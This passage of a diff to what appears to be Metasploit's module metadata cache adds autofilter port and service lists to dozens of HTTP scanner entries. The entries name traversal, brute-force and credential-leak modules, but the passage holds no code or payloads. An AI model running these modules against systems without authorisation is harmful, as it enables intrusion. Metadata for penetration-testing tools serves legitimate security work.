], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb", @@ -17868,6 +24214,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/mod_negotiation_brute.rb", @@ -17897,6 +24258,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb", @@ -17931,6 +24307,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb", @@ -17968,6 +24359,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-16 15:13:23 +0000", "path": "/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb", @@ -17997,6 +24403,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/mybook_live_login.rb", @@ -18029,6 +24450,21 @@ "platform": "", "arch": "", "rport": 8087, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/netdecision_traversal.rb", @@ -18061,6 +24497,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb", @@ -18094,6 +24545,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/nginx_source_disclosure.rb", @@ -18124,6 +24590,21 @@ "platform": "", "arch": "", "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb", @@ -18154,6 +24635,22 @@ "platform": "", "arch": "", "rport": 3037, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 3037 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb", @@ -18186,6 +24683,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/novell_mdm_creds.rb", @@ -18215,6 +24727,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb", @@ -18244,6 +24771,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/octopusdeploy_login.rb", @@ -18274,6 +24816,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/open_proxy.rb", @@ -18303,6 +24860,21 @@ "platform": "", "arch": "", "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/openmind_messageos_login.rb", @@ -18337,6 +24909,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/options.rb", @@ -18369,6 +24956,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb", @@ -18401,6 +25003,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb", @@ -18430,6 +25047,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/oracle_ilom_login.rb", @@ -18459,6 +25091,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/owa_ews_login.rb", @@ -18488,6 +25126,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb", @@ -18525,6 +25178,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-02-23 13:16:41 +0000", "path": "/modules/auxiliary/scanner/http/owa_login.rb", @@ -18554,6 +25222,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-24 23:21:59 +0000", "path": "/modules/auxiliary/scanner/http/phpmyadmin_login.rb", @@ -18583,6 +25266,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/pocketpad_login.rb", @@ -18612,6 +25310,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb", @@ -18641,6 +25354,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/radware_appdirector_enum.rb", @@ -18671,6 +25399,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb", @@ -18700,6 +25443,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/rails_mass_assignment.rb", @@ -18731,6 +25489,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb", @@ -18760,6 +25533,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/replace_ext.rb", @@ -18790,6 +25578,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb", @@ -18819,6 +25622,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/rfcode_reader_enum.rb", @@ -18850,6 +25668,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/rips_traversal.rb", @@ -18880,6 +25713,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb", @@ -18909,6 +25757,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/robots_txt.rb", @@ -18940,6 +25803,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/s40_traversal.rb", @@ -18969,6 +25847,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb", @@ -18998,6 +25891,22 @@ "platform": "", "arch": "", "rport": 6405, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 6405 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb", @@ -19027,6 +25936,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb", @@ -19056,6 +25980,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb", @@ -19085,6 +26024,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/scraper.rb", @@ -19114,6 +26068,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sentry_cdu_enum.rb", @@ -19143,6 +26112,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb", @@ -19172,6 +26156,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sevone_enum.rb", @@ -19205,6 +26204,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-15 18:54:45 +0000", "path": "/modules/auxiliary/scanner/http/simple_webserver_traversal.rb", @@ -19238,6 +26252,21 @@ "platform": "", "arch": "", "rport": 49152, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb", @@ -19270,6 +26299,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb", @@ -19301,6 +26345,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/smt_ipmi_static_cert_scanner.rb", @@ -19332,6 +26382,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb", @@ -19361,6 +26426,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/scanner/http/soap_xml.rb", @@ -19391,6 +26471,21 @@ "platform": "", "arch": "", "rport": 4444, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sockso_traversal.rb", @@ -19421,6 +26516,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/splunk_web_login.rb", @@ -19450,6 +26560,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/squid_pivot_scanning.rb", @@ -19480,6 +26605,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb", @@ -19511,6 +26651,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/ssl.rb", @@ -19542,6 +26688,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/ssl_version.rb", @@ -19575,6 +26736,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-08 19:00:11 +0000", "path": "/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb", @@ -19604,6 +26780,21 @@ "platform": "", "arch": "", "rport": 9080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/surgenews_user_creds.rb", @@ -19633,6 +26824,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/svn_scanner.rb", @@ -19662,6 +26868,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb", @@ -19695,6 +26916,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb", @@ -19726,6 +26962,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb", @@ -19760,6 +27011,21 @@ "platform": "", "arch": "", "rport": 41080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb", @@ -19789,6 +27055,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb", @@ -19818,6 +27099,21 @@ "platform": "", "arch": "", "rport": 31001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb", @@ -19847,6 +27143,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/title.rb", @@ -19879,6 +27190,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/tomcat_enum.rb", @@ -19927,6 +27253,25 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 8081, + 8444, + 9080, + 19300 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-02-13 14:31:56 +0000", "path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb", @@ -19960,6 +27305,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb", @@ -19991,6 +27351,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/trace.rb", @@ -20020,6 +27395,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/trace_axd.rb", @@ -20049,6 +27439,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/typo3_bruteforce.rb", @@ -20078,6 +27483,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/vcms_login.rb", @@ -20107,6 +27527,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/verb_auth_bypass.rb", @@ -20136,6 +27571,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/vhost_scanner.rb", @@ -20166,6 +27616,21 @@ "platform": "", "arch": "", "rport": 85, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/wangkongbao_traversal.rb", @@ -20195,6 +27660,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/web_vulndb.rb", @@ -20224,6 +27704,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/webdav_internal_ip.rb", @@ -20253,6 +27748,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/webdav_scanner.rb", @@ -20282,6 +27792,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/webdav_website_content.rb", @@ -20313,6 +27838,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/webpagetest_traversal.rb", @@ -20345,6 +27885,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/wildfly_traversal.rb", @@ -20380,6 +27935,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 17:34:52 +0000", "path": "/modules/auxiliary/scanner/http/wordpress_content_injection.rb", @@ 